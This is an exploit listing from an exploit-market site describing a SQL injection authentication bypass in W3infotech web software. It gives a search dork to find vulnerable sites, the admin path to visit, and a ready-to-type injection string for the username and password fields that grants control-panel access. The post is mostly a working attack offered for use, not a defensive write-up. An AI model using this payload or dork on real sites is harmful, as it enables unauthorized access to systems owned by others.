[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

W3infotech ( Auth Bypass ) SQL Injection Vulnerability

Author
ViRuS_Hima
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10010
Category
web applications
Date add
24-11-2009
Platform
unsorted
======================================================
W3infotech ( Auth Bypass ) SQL Injection Vulnerability
======================================================

[+]====================================================================||
[*] About    : W3infotech ( Auth Bypass ) SQL injection Vulnerability  ||
[!] Site     : http://www.w3infotech.com                               ||
[!] Author   : ViRuS_HiMa                                                                                   ||                                                                ||
[!] Location : Cairo-007                                               ||
[!]====================================================================||
[!]                  [H]eL[L] [Z]on[E] [C]re[W]                        ||
[!]====================================================================||
[!]
[!] Exploitation :                                                     ||
[!]
[!]    you can use this dork :  "Powered By W3infotech"                ||
[!]
[!]    Just add the admin path ,, so it will be :                      ||
[!]   
[!]    http://server/admin                                             ||   
[!]
[!]    then auth bypass using this password :                          ||
[!]
[!]    hima' or 'a'='a                                                 ||
[!]
[!]    it mean that you have to type the same code in user and pass    ||
[!]
[!]    what you got ?? ,, you are in the script control panel now :p   ||
[!]                                                              
[!]====================================================================||


#  0day.today [2024-06-16]  #